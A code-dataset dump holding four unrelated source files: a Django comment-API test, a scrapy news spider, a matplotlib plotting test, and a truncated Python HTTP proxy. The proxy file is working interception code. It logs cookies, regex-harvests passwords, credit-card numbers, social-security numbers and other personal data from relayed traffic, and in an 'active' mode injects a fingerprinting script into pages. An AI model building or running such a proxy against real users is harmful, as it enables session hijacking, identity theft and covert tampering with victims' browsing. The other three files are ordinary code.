+{"seq_id":"21276399451","text":"from django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\nfrom .models import Post, Comment\nfrom knox.models import AuthToken\n\nCustomUser = get_user_model()\n\nclass CommentAPITests(APITestCase):\n def setUp(self):\n self.user = CustomUser.objects.create_user(username='testuser', email='testuser@example.com', password='testpass')\n self.token = AuthToken.objects.create(self.user)[1]\n self.post = Post.objects.create(description='Test Description', contact_info='Test Contact Info', user_info=self.user)\n self.comment = Comment.objects.create(content='Test Comment', post=self.post, user=self.user)\n def test_new_comment(self):\n url = reverse('new_comment')\n data = {'post_id': self.post.id, 'content': 'Test Comment'}\n self.client.credentials(HTTP_AUTHORIZATION=f'Token {self.token}')\n\n self.client.force_authenticate(user=self.user)\n response = self.client.post(url, data)\n print(response)\n print(response.data)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(response.data['content'], data['content'])\n self.assertEqual(response.data['post'], data['post_id'])\n self.assertEqual(response.data['user'], self.user.id)\n\n def test_update_comment(self):\n url = reverse('update_comment', args=[self.comment.id])\n data = {'content': 'Updated Comment'}\n self.client.credentials(HTTP_AUTHORIZATION=f'Token {self.token}')\n\n self.client.force_authenticate(user=self.user)\n response = self.client.put(url, data)\n print(response)\n print(response.data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['content'], data['content'])\n self.assertTrue(response.data['is_edited'])\n\n def test_delete_comment(self):\n url = reverse('delete_comment', args=[self.comment.id])\n self.client.force_authenticate(user=self.user)\n response = self.client.delete(url)\n print(response)\n print(response.data)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n comment = Comment.objects.get(id=self.comment.id)\n self.assertTrue(comment.is_deleted)\n\n def test_get_comments(self):\n url = reverse('get_comments', args=[self.post.id])\n response = self.client.get(url)\n print(response)\n print(response.data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data), 1)\n self.assertEqual(response.data[0]['id'], self.comment.id)\n\n def test_get_user_comments(self):\n url = reverse('get_user_comments', args=[self.user.id])\n response = self.client.get(url)\n print(response)\n print(response.data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data), 1)\n self.assertEqual(response.data[0]['id'], self.comment.id) ","repo_name":"MuhammadBun/BuySellGo","sub_path":"comment/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"20194736904","text":"# -*- coding: utf-8 -*-\r\nimport scrapy\r\nimport time\r\nfrom scrapy.conf import settings\r\nfrom scrapy.mail import MailSender\r\nfrom ganji.items import BidNewsInfo\r\nimport authome_compare\r\nimport logging\r\n\r\nwebsite='newsbid'\r\n\r\nclass CarSpider(scrapy.Spider):\r\n name = website\r\n start_urls = ['http://www.bidnews.cn/caigou/search-htm-page-1-kw-qichejituan.html']\r\n # settings.set('DOWNLOAD_DELAY', 0.5, priority='cmdline')\r\n def __init__(self, **kwargs):\r\n # report bug session\r\n self.mailer = MailSender.from_settings(settings)\r\n self.counts = 0\r\n self.carnum = 50000\r\n # Mongo setting\r\n settings.set('CrawlCar_Num', self.carnum, priority='cmdline')\r\n settings.set('MONGODB_DB', 'newcar', priority='cmdline')\r\n settings.set('MONGODB_COLLECTION', website, priority='cmdline')\r\n\r\n def parse(self,response):\r\n url=response.url\r\n yield scrapy.Request(url,self.parse_middle)\r\n\r\n def parse_middle(self,response):\r\n x=response.xpath('//table[@class=\"zblist_table\"]/tr')\r\n try:\r\n for temp in x[1:36]:\r\n url = str(temp.xpath('td[3]/a/@href').extract_first())\r\n # url = str(temp.xpath('td[2]/a/@href').extract_first())\r\n yield scrapy.Request(url, callback=self.info_parse)\r\n except:\r\n for temp in x[1:36]:\r\n # url = str(temp.xpath('td[3]/a/@href').extract_first())\r\n url = str(temp.xpath('td[2]/a/@href').extract_first())\r\n yield scrapy.Request(url, callback=self.info_parse)\r\n next_page=response.xpath(u'//a[contains(text(),\"下一页\")]/@href')\r\n if next_page:\r\n url = response.urljoin(next_page.extract_first())\r\n yield scrapy.Request(url,callback=self.parse_middle,dont_filter=True)\r\n\r\n def info_parse(self,response):\r\n self.counts += 1\r\n item = BidNewsInfo()\r\n item['grabtime'] = time.strftime('%Y-%m-%d', time.localtime(time.time()))\r\n item['url'] = response.url\r\n item['status'] = response.url\r\n item['website'] = website\r\n item['desc']=response.xpath('//div[@class=\"xq_title\"]/h1/text()').extract_first() \\\r\n if response.xpath('//div[@class=\"xq_title\"]/h1/text()').extract_first() else \"_\"\r\n item['updatetime']=response.xpath('//div[@class=\"color_9 xq_time\"]/text()').re('\\d+\\-\\d+\\-\\d+')[0] \\\r\n if response.xpath('//div[@class=\"color_9 xq_time\"]/text()').re('\\d+\\-\\d+\\-\\d+') else \"_\"\r\n yield item\r\n","repo_name":"sinnettluo/ChenProject","sub_path":"cagey/newcar/ganji/spiders/bidnews_info.py","file_name":"bidnews_info.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"4346265747","text":"\"\"\"Test the output functions\n\"\"\"\n\nimport pytest\n\n\n@pytest.mark.output\ndef test_Arrow3D():\n import matplotlib.pyplot as plt\n\n from skydy.output import Arrow3D\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection=\"3d\")\n\n basis = [\n (0, 2),\n (0, 3),\n (0, 4),\n ]\n arrow = Arrow3D(\n *basis,\n mutation_scale=5,\n lw=1,\n arrowstyle=\"-|>\",\n color=\"r\",\n )\n ax.add_artist(arrow)\n\n plt.show()\n","repo_name":"smkyle90/skydy","sub_path":"tests/output/test_Arrow3D.py","file_name":"test_Arrow3D.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"42009423720","text":"import socket\nimport signal\nimport threading\nfrom urllib.parse import urlparse, parse_qsl\nimport sys\nimport re\nimport logging\n\n\ndef get_fields(headers):\n\n fields = {}\n \n for header in headers:\n index = header.find(' ')\n # drop the ':' character\n field = header[:index-1]\n # get the value of the field\n value = header[index+1:]\n # add field, value to fields\n if field not in fields:\n fields[field] = list()\n fields[field].append(value)\n \n return fields\n\n\ndef recv_http(sock):\n \n request_length = 4096 \n content_length = -1\n fields = {}\n data = b''\n content = b''\n headers = [] \n\n # read request/status line and headers\n while True:\n received = sock.recv(request_length)\n if len(received) == 0:\n return None # error headers not found\n data += received\n # find the end of the the headers\n end = data.find(b'\\r\\n\\r\\n')\n if end != -1:\n headers = re.split('\\r\\n', data[:end+2].decode())\n # store the request line\n request = headers[0]\n # get fields and skip request/status line\n fields = get_fields(headers[1:-1]) \n # check for http get request\n if request.split(' ')[0] == 'GET':\n return headers[:-1], fields, data, ''\n else:\n break\n \n # store the post/response message content length \n if 'Content-Length' in fields:\n content_length = int(fields['Content-Length'][0])\n \n # store remaining content\n if end+4 < len(data):\n content += data[end+4:]\n # check if all content read\n if len(content) == content_length:\n return headers[:-1], fields, data, content\n \n # read body of request/response \n while True:\n received = sock.recv(request_length)\n if len(received) == 0:\n break\n data += received \n # update length of content received \n content += received\n # check if all content has been read\n if len(content) == content_length:\n break\n return headers[:-1], fields, data, content\n\n\ndef get_info_qs(qs, info, regexes):\n\n # parse query string into a dictionary\n query = dict(parse_qsl(qs))\n \n # store values from common query parameters\n for param in info.keys() & query.keys():\n info[param].add(query[param])\n \n # store values that match regex patterns \n for param, pattern in regexes.items():\n matches = re.findall(pattern, qs)\n if len(matches) > 0:\n for match in matches:\n info[param].add(match) \n \n \ndef get_info(data, info, regexes):\n \n # store values that match regex patterns \n for param, pattern in regexes.items():\n matches = re.findall(pattern, data)\n if len(matches) > 0:\n for match in matches:\n info[param].add(match) \n\n\ndef client_thread(logger, mode, client_sock, proxy_ip, proxy_port):\n # all possible params looked for \n params = set(['firstname', 'lastname', 'birthday', 'year', 'email', 'password', \n 'address', 'credit-card', 'social-security', 'phone', \n 'city', 'state', 'zip'])\n\n # regex patterns for users data\n regexes = {'email': '[a-zA-Z0-9]+(?:[\\.\\-_][a-zA-Z0-9]+)*@[a-zA-Z0-9]+\\.[a-zA-Z]{3}',\n 'year': '(?:\\d{1,2}[-\\./\\s]\\d{1,2}[-\\./\\s]\\d{4})|(?:\\d{4}[-\\./\\s]\\d{1,2}[-\\./\\s]\\d{1,2})',\n 'address': '\\d{1,3}.?\\d{0,3}\\s[a-zA-Z]{2,30}\\s[a-zA-Z]{2,15}',\n 'credit-card': '\\d{4}(?:[-\\s]\\d{4}){3}',\n 'social-security': '\\d{3}[-\\s]\\d{2}[-\\s]\\d{4}',\n 'phone': '(?:(?:1-)?\\d{3}-\\d{3}-\\d{4})|(?:1?\\(\\d{3}\\)\\d{3}-\\d{4})',\n 'zip': '\\d{5}(?:[-\\s]\\d{4})?'} \n info = dict([(param, set()) for param in params]) \n\n \n # get the request from browser\n request_length = 4096\n #request = client_sock.recv(request_length)\n headers, fields, request, content = recv_http(client_sock) \n\n url = headers[0].split(' ')[1]\n parsed = urlparse(url)\n \n # log cookie information\n if 'Set-Cookie' in fields:\n logger.info('Set-Cookie: ' + ','.join(fields['Set-Cookie']))\n \n if 'Cookie' in fields:\n logger.info('Cookie: ' + ','.join(fields['Cookie']))\n\n # check for injected javascript request:\n if len(parsed.netloc) == 0 and len(parsed.query) > 0:\n query = dict(parse_qsl(parsed.query))\n # check if all params are present in request\n if all(param in query for param in ['user-agent', 'screen', 'lang']):\n info2 = open(\"info_2.txt\", \"w\")\n # store parameters to file\n for param, val in query.items():\n info2.write(param + \": \" + val + \"\\n\")\n info2.close()\n \n if parsed.scheme == 'http':\n\n # check for info in client content \n if len(content) > 0:\n # check content type of client request\n if 'Content-Type' in fields:\n # get mime type of content\n content_type = fields['Content-Type'][0]\n # check if content type is a query string\n if content_type == 'application/x-www-form-urlencoded':\n # get info found in query string\n get_info_qs(content.decode(), info, regexes)\n elif content_type.split('/')[0] == 'text':\n # get info found in text \n get_info(data.decode(), info, regexes) \n\n # check for info in url\n if len(parsed.query) > 0:\n # get info found in query string\n get_info_qs(parsed.query, info, regexes)\n\n port = 80\n server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n server_sock.connect((parsed.netloc, port))\n server_sock.sendall(request)\n \n #data, headers, fields, content = recv_http(server_sock)\n headers, fields, data, content = recv_http(server_sock)\n \n # log cookie information\n if 'Set-Cookie' in fields:\n logger.info('Set-Cookie: ' + ','.join(fields['Set-Cookie']))\n \n if 'Cookie' in fields:\n logger.info('Cookie: ' + ','.join(fields['Cookie']))\n\n if 'Content-Type' in fields:\n # get mime type of content\n content_type = fields['Content-Type'][0]\n # check if type is text\n if content_type.split('/')[0] == 'text': \n # update info found in content \n get_info(data.decode(), info, regexes)\n \n # log all info found \n for param, vals in info.items():\n if len(vals) > 0:\n logger.info(param + ': ' + ','.join(vals)) \n \n # check mode being used\n if mode == \"active\":\n # inject script\n script_format = '''\n'''\n # insert proxy ip and port to script\n script = script_format.format(ip = proxy_ip, port = proxy_port)\n html_end = data.find(b'